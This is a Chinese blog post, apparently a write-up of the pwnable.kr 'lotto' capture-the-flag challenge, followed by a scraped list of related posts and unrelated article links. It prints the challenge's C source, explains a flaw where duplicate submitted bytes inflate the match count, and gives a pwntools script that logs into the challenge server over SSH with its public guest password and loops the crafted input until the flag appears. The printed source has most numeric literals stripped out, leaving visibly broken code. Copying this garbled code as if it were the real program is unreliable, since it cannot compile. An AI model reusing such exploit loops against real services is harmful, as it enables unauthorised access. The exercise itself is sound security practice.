pwnable。好像最近的几道题都不需要看汇编。

ssh lotto@pwnable.kr -p2222 (pw:guest)

直接down下来源码

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <fcntl.h>

unsigned char submit[];

void play(){

    int i;

    printf("Submit your 6 lotto bytes : ");

    fflush(stdout);

    int r;

    r = read(, submit, );

    printf("Lotto Start!\n");

    //sleep(1);

    // generate lotto numbers

    int fd = open("/dev/urandom", O_RDONLY);

    if(fd==-){

        printf("error. tell admin\n");

        exit(-);

    }

    unsigned char lotto[];

    if(read(fd, lotto, ) != ){

        printf("error2. tell admin\n");

        exit(-);

    }

    for(i=; i<; i++){

        lotto[i] = (lotto[i] % ) + ;        // 1 ~ 45

    }

    close(fd);

    // calculate lotto score

    int match = , j = ;

    for(i=; i<; i++){

        for(j=; j<; j++){

            if(lotto[i] == submit[j]){

                match++;

            }

        }

    }

    // win!

    if(match == ){

        system("/bin/cat flag");

    }

    else{

        printf("bad luck...\n");

    }

}

void help(){

    printf("- nLotto Rule -\n");

    printf("nlotto is consisted with 6 random natural numbers less than 46\n");

    printf("your goal is to match lotto numbers as many as you can\n");

    printf("if you win lottery for *1st place*, you will get reward\n");

    printf("for more details, follow the link below\n");

    printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");

    printf("mathematical chance to win this game is known to be 1/8145060.\n");

}

int main(int argc, char* argv[]){

    // menu

    unsigned int menu;

    while(){

        printf("- Select Menu -\n");

        printf("1. Play Lotto\n");

        printf("2. Help\n");

        printf("3. Exit\n");

        scanf("%d", &menu);

        switch(menu){

            case :

                play();

                break;

            case :

                help();

                break;

            case :

                printf("bye\n");

                return ;

            default:

                printf("invalid menu\n");

                break;

        }

    }

    return ;

}

看到随机数是从 /dev/urandom中取出的,搜了一下,发现这个是伪随机。

最开始的想法是直接找到第一个爆破一下,发现爆破难度还是挺大的,因为每次运行都是不一样的,这个是系统自行维护的。

找一下源代码吧。

    for(i=0; i<6; i++){

        for(j=0; j<6; j++){

            if(lotto[i] == submit[j]){

                match++;

            }

        }

这部分乍一看好像没问题,循环6*6次,找到6次一样的就够了。

大致想想好像没啥问题,但是总觉得不对,如果这样输入6个1,当产生的lotto[6]中有一个是1就bypass了。

上脚本验证一下:

from pwn import *

s= ssh(host='pwnable.kr',user='lotto',password='guest',port=2222)

pro = s.process('/home/lotto/lotto')

print pro.recv()

pro.sendline('')

print pro.recv()

str1 = ""

str1 += chr(1)+chr(1)+chr(1)+chr(1)+chr(1)+chr(6)

pro.sendline(str1)

revcstr =  pro.recv()

print len(revcstr),revcstr

#exit()

while 1:

    pro.sendline('')

    print pro.recv()

    pro.sendline(str1)

    a =  pro.recv()

    if len(a)>71: #71是先验知识,指输入错误返回字符串的长度,就是下面字符串的长度

        print a

        break

    #pass
'''

Lotto Start!
bad luck...
- Select Menu -
1. Play Lotto
2. Help
3. Exit

'''

运行一下:

【pwnable.kr】lotto的更多相关文章

  1. 【pwnable.kr】 asm

    一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #inclu ...

  2. 【pwnable.kr】 [simple login]

    Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 先看看ida里面的逻辑. 比较重要的信息时input变量再 ...

  3. 【pwnable.kr】 brainfuck

    pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownl ...

  4. 【pwnable.kr】 unlink

    pwnable.kr 第一阶段的最后一题! 这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考<C和C++安全编码一书>//不是广告 #includ ...

  5. 【pwnable.kr】 memcpy

    pwnable的新一题,和堆分配相关. http://pwnable.kr/bin/memcpy.c ssh memcpy@pwnable.kr -p2222 (pw:guest) 我觉得主要考察的是 ...

  6. 【pwnable.kr】 codemap

    pwnable新的一题. download: http://pwnable.kr/bin/codemap.exe ssh codemap@pwnable.kr -p2222 (pw:guest) 这道 ...

  7. 【pwnable.kr】 uaf

    目测是比较接近pwnable的一道题.考察了uaf(use after free的内容),我觉得说白了就是指针没有初始化的问题. ssh uaf@pwnable.kr -p2222 (pw:guest ...

  8. 【pwnable.kr】input

    这道题是一道一遍一遍满足程序需求的题. 网上其他的题解都是用了C语言或者python语言的本地调用,我想联系一下pwntools的远程调用就写了下面的脚本, 执行效果可以通过1~4的检测,到最后soc ...

  9. 【pwnable.kr】cmd2

    这道题是上一个cmd1的升级版 ssh cmd2@pwnable.kr -p2222 (pw:mommy now I get what PATH environmentis for :)) 登录之后, ...

随机推荐

  1. #P1099 树网的核 题解

    题目描述 pdf 题解 这一题,刚开始看题目感觉好像很难,题目又长……一看数据范围,呵呵. 已经给出来这是个DAG,所以不用担心连通性的问题.那么怎么做呢? 朴素的做法是把树的直径的两个端点都统计出来 ...

  2. free to monitor your sqlserver easy and safe and ...

    Unlike AWR in Oracle, Sqlserver does not have offical way to make history performance information fo ...

  3. SpringMVC 自定义类型转换

    类型转换可以将请求参数转换为指定的类型.指定的格式(数据的格式化),然后传给业务方法的参数. Spring MVC内置了常用的类型转换器.如果内置的类型转换器满足不了需求,可以使用自定义的类型转换. ...

  4. PHP开发者该知道的5个Composer小技巧

    Composer 是新一代的PHP依赖管理工具.本文介绍使用Composer的五个小技巧,希望能给你的PHP开发带来方便. 1. 仅更新单个库 只想更新某个特定的库,不想更新它的所有依赖,很简单 co ...

  5. nginx_2_nginx进程模型

    1.nginx进程模型概述 在上一节我们已经已经成功在linux服务器上安装了nginx,启动nginx后,查看进程:ps -ef | grep nginx 能看到启动nginx进程后,有一个mast ...

  6. 本周总结(19年暑假)—— Part5

    日期:2019.8.11 博客期:111 星期日

  7. Windows XP 常用DOS命令

      winver 检查Windows版本 wmimgmt.msc 打开windows管理体系结构(WMI) wupdmgr windows更新程序 wscript windows脚本宿主设置 writ ...

  8. [Linux] day06——文档管理

    文档管理===================mkdir 创建目录 -p /路径/目录名  (父路径不存在 -p) ---------------------------------------  t ...

  9. python读取文件用b模式读取

    f = open('aaa','rb')    返回的是字节 字符串编码 python中所有的字符串编码为Unicode,如果从一个文件读取字符串,那么该字符串的编码就是该文件的编码. f.tell( ...

  10. 七 异常处理的两种方式(创建全局异常处理器&自定义异常)

    1 创建全局异常处理器 实现HandlerExceptionResolve接口 package com.springmvc01; import javax.servlet.http.HttpServl ...